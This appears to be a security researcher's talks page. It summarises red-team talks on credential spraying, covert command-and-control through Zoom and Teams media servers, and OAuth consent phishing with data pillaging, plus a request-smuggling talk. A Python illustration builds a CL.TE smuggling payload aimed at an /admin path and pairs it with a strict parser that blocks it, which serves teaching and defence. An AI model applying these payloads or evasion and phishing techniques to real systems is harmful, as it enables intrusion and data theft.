// talks
conference presentations, demos, and speaking engagements
Brutus: Modern Credential Testing
Demo Labs presentation showcasing Brutus, a modern multi-protocol credential testing tool written in pure Go. The demo highlights automated identification and validation of default credentials, compromised passwords, and SSH keys across enterprise environments at scale.
key takeaways
- Multi-protocol credential testing across 24+ services in a single binary
- Embedded known-compromised SSH key testing from Rapid7 and HashiCorp Vagrant
- Private key spraying for lateral movement assessment
- Native JSON pipeline integration with fingerprintx and naabu
Ghost Calls: Abusing Web Conferencing for Covert Command & Control
Red teams often struggle to keep interactive C2 alive in monitored networks. Low-and-slow channels are stealthy but insufficient for high-bandwidth tasks such as SOCKS proxying, pivoting, or hidden VNC. This research addresses that gap by using real-time collaboration protocols, specifically the whitelisted media servers of services such as Zoom and Microsoft Teams, to create short-lived, high-speed C2 channels that blend into normal enterprise traffic.
key takeaways
- Leverage TURN servers from Zoom/Teams to establish covert WebRTC tunnels
- Traffic appears as legitimate video conferencing on port 443, bypassing DPI and TLS inspection
- Introduced TURNt, an open-source tool for automated covert traffic routing
- Detection challenges and defensive countermeasures for security teams
coverage
Featured in BleepingComputer, Cybersecurity News, GBHackers, Black Hat Ethical Hacking, and numerous security publications covering the technique's implications for enterprise security.
OAuthSeeker: Leveraging OAuth Phishing for Initial Access
Tool demonstration of OAuthSeeker, a red team tool for consent-based phishing attacks that use malicious OAuth applications to target Microsoft Azure and Office 365 users. The demo covers the end-to-end attack path, from the initial phishing lure to post-exploitation with the embedded GraphRunner for data pillaging across OneDrive, SharePoint, Teams, and Outlook.
key takeaways
- OAuth consent phishing with verified Azure applications
- Admin control panel for credential management and token refresh
- Integrated GraphRunner for immediate post-exploitation
- OAuthAzure and OAuthPillage utilities for Azure resource impersonation
Leveraging Request Smuggling for Authentication Bypass and RCE
HTTP Request Smuggling (HRS) was first described in 2005 but remains underappreciated in today's security world. This presentation covers three critical HRS vulnerabilities in F5 BIG-IP and Qlik Sense Enterprise that each led to unauthenticated remote code execution, with Internet-exposed instances at roughly ten percent of the global Fortune 500.
"Just like when you see a login screen you might think to try 'or 1=1' to exploit SQLi, when you see two different parts of an application processing HTTP requests, each responsible for different parts of the security model, think 'HTTP request smuggling'."
key takeaways
- CVE-2023-41265 (ZeroQlik): HTTP tunneling vulnerability in Qlik Sense - CVSS 9.9
- CVE-2023-48365 (DoubleQlik): Patch bypass for ZeroQlik - CVSS 9.9
- CVE-2023-46747 (Refresh): F5 BIG-IP request smuggling vulnerability
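The rule of thumb quoted above, as an added example that is not part of the talk and does not reproduce any of the vendor bugs listed: two minimal HTTP/1.1 parsers, one that frames bodies by Content-Length (a typical front-end) and one that prefers Transfer-Encoding: chunked (a typical back-end), read the same constructed CL.TE byte stream and disagree about where the first request ends, so the back-end sees a second request that the front-end never authenticated. The hostname, paths and header values are constructed sample data; the strict parser at the end shows the check RFC 9112 section 6.3 permits a server to make. The specific F5 and Qlik parser pairs are not modelled here.

```python
# Added illustration of a CL.TE desync between two HTTP/1.1 body-delimiting
# parsers, plus the strict check that refuses ambiguous framing. Not code from
# the talk or from the affected products; all input below is constructed.
from typing import Dict, List, Tuple

Request = Tuple[str, bytes]  # (request line, body)


def _parse_head(buf: bytes, pos: int) -> Tuple[str, Dict[str, str], int]:
    """Parse request line and headers at pos; return (line, headers, body_start)."""
    end = buf.index(b"\r\n\r\n", pos)
    lines = buf[pos:end].decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, end + 4


def _read_chunked(buf: bytes, pos: int) -> Tuple[bytes, int]:
    """Decode a chunked body at pos; return (body, position after the trailer section)."""
    body = b""
    while True:
        line_end = buf.index(b"\r\n", pos)
        size = int(buf[pos:line_end].split(b";")[0], 16)  # ignore chunk extensions
        pos = line_end + 2
        if size == 0:
            while True:  # skip optional trailer headers up to the empty line
                line_end = buf.index(b"\r\n", pos)
                empty = line_end == pos
                pos = line_end + 2
                if empty:
                    return body, pos
        body += buf[pos:pos + size]
        pos += size + 2  # chunk data plus its trailing CRLF


def _split(buf: bytes, prefer_te: bool, strict: bool) -> List[Request]:
    """Cut a byte stream into requests using one framing policy."""
    reqs: List[Request] = []
    pos = 0
    while pos < len(buf):
        line, hdrs, pos = _parse_head(buf, pos)
        has_cl = "content-length" in hdrs
        has_te = "transfer-encoding" in hdrs
        if strict and has_cl and has_te:
            # RFC 9112 s6.3: both delimiters present is a smuggling signal; treat as an error.
            raise ValueError(f"ambiguous framing in {line!r}: Content-Length and Transfer-Encoding")
        if prefer_te and hdrs.get("transfer-encoding", "").lower() == "chunked":
            body, pos = _read_chunked(buf, pos)
        else:
            n = int(hdrs.get("content-length", "0"))
            body, pos = buf[pos:pos + n], pos + n
        reqs.append((line, body))
    return reqs


def split_cl_first(buf: bytes) -> List[Request]:
    """Front-end view: frames every body by Content-Length, ignores Transfer-Encoding."""
    return _split(buf, prefer_te=False, strict=False)


def split_te_first(buf: bytes) -> List[Request]:
    """Back-end view: honours Transfer-Encoding: chunked, falls back to Content-Length."""
    return _split(buf, prefer_te=True, strict=False)


def split_strict(buf: bytes) -> List[Request]:
    """Hardened view: rejects any request carrying both delimiters."""
    return _split(buf, prefer_te=True, strict=True)


def desync_views(buf: bytes) -> Tuple[int, int]:
    """How many requests each side sees; a mismatch is the smuggling primitive."""
    return len(split_cl_first(buf)), len(split_te_first(buf))


def strict_rejects(buf: bytes) -> bool:
    """True when the hardened parser refuses the stream."""
    try:
        split_strict(buf)
    except ValueError:
        return True
    return False


# Constructed CL.TE payload: the front-end's Content-Length swallows the whole
# body, while the back-end stops at the terminating "0" chunk and treats the
# rest as a fresh request to /admin that never passed the front-end's checks.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: app.example.internal\r\nX-Smuggled: 1\r\n\r\n"
FRONT_BODY = b"0\r\n\r\n" + SMUGGLED
PAYLOAD = (
    b"POST / HTTP/1.1\r\n"
    b"Host: app.example.internal\r\n"
    b"Content-Length: %d\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n" % len(FRONT_BODY)
) + FRONT_BODY

# A benign request with a single delimiter, which the strict parser accepts.
BENIGN = b"POST / HTTP/1.1\r\nHost: app.example.internal\r\nContent-Length: 2\r\n\r\nhi"

if __name__ == "__main__":
    print("front-end (CL) sees", [r[0] for r in split_cl_first(PAYLOAD)])
    print("back-end  (TE) sees", [r[0] for r in split_te_first(PAYLOAD)])
    print("strict parser rejects payload:", strict_rejects(PAYLOAD))
```

The front-end parser returns one POST whose body happens to contain a GET; the back-end parser returns two requests, and the second one reaches application logic with whatever authorization the back-end infers on its own. Refusing requests that carry both delimiters, as the strict parser does, closes this particular ambiguity but not others (duplicate Content-Length headers, obfuscated Transfer-Encoding values), so the safer design is a single component that owns request framing for the whole path.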